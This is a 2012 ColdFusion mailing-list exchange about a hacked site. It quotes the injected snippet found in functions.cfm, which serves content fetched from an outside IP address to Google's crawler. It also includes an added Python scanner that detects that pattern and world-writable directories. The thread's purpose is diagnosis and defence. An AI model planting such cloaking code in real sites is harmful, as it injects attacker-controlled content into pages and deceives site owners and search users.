I've seen something like this on a shared server that was running
osCommerce. The uploads directory had the wrong permissions set, and the
attacker uploaded a server admin script that could set permissions on other
directories. They were then able to inject code into every index.php,
index.html, and index.cfm file it found.

If you are on a shared environment I would look for this type of attack on
the server.

Best Regards,
Donnie Bachan
"Nitendo Vinces - By Striving You Shall Conquer"


On Tue, Nov 13, 2012 at 9:56 PM, Yuliang Ruan <[email protected]> wrote:

>
> >Recently a site of ours got hacked - basically, a Google search of the site
> >was returning Viagra info!
> >What we got was a small script added to the end of a functions.cfm file:
> >
> ><cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
> ><cfif (Find( "google", REQUEST.UserAgent )) >
> ><cfhttp method="get" url="http://168.16.228.250/fms/">
> ><cfoutput>#cfhttp.filecontent#</cfoutput>
> ></cfif>
> >
> >I'm not the server admin for this site, so they're sorta pointing the
> >finger at us developers, and we're pointing fingers back at them about
> >lax server security. We've got a boatload of stuff on this site to
> >prevent SQL injection, including Justin D. Scott's application script,
> >carefully checking anything that goes into the database, client and server
> >side form validation, blah, blah, blah...
> >
> >Anybody seen the above, and if so, thoughts? Anybody manage to determine
> >how the exploit happened to start with?
>
>
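
Added example, not part of the original messages and not code from either poster: a Python scanner that walks a webroot for templates combining the three traits of the quoted snippet (user-agent check, remote `cfhttp` fetch, echo of the fetched body) and lists world-writable directories like the uploads directory described in the reply. The function names, indicator set and extension list are assumptions chosen for illustration; the sample is constructed from the quoted snippet with a documentation address.

```python
import os
import re
import stat

# Heuristics taken from the snippet quoted in this thread (an assumption, not
# a complete signature set): user-agent sniffing, a remote fetch, and echoing
# the fetched body back into the page.
INDICATORS = {
    "ua_check": re.compile(r"cgi\.http_user_agent", re.I),
    "remote_fetch": re.compile(r"<cfhttp\b[^>]*\burl\s*=\s*[\"']https?://", re.I),
    "echo_body": re.compile(r"#\s*cfhttp\.filecontent\s*#", re.I),
}
TEMPLATE_EXT = (".cfm", ".cfc", ".php", ".html")

def match_indicators(text):
    """Return the sorted names of the indicators present in one template."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_webroot(root):
    """Walk root; return (suspect_files, world_writable_dirs)."""
    suspects, writable = [], []
    for dirpath, _dirs, files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            writable.append(dirpath)
        for name in files:
            if not name.lower().endswith(TEMPLATE_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = match_indicators(fh.read())
            # All three together is the cloaking pattern; any one alone is
            # common in legitimate code, so it is not reported.
            if len(hits) == len(INDICATORS):
                suspects.append(path)
    return sorted(suspects), sorted(writable)

# Constructed sample: the quoted snippet with a documentation address
# (192.0.2.10) substituted for the host.
SAMPLE = ('<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />'
          '<cfif (Find( "google", REQUEST.UserAgent )) >'
          '<cfhttp method="get" url="http://192.0.2.10/fms/">'
          '<cfoutput>#cfhttp.filecontent#</cfoutput></cfif>')

if __name__ == "__main__":
    print(match_indicators(SAMPLE))
    print(scan_webroot("."))
```

A hit is a lead for manual review and for comparing the file against source control, not proof of compromise.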


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353149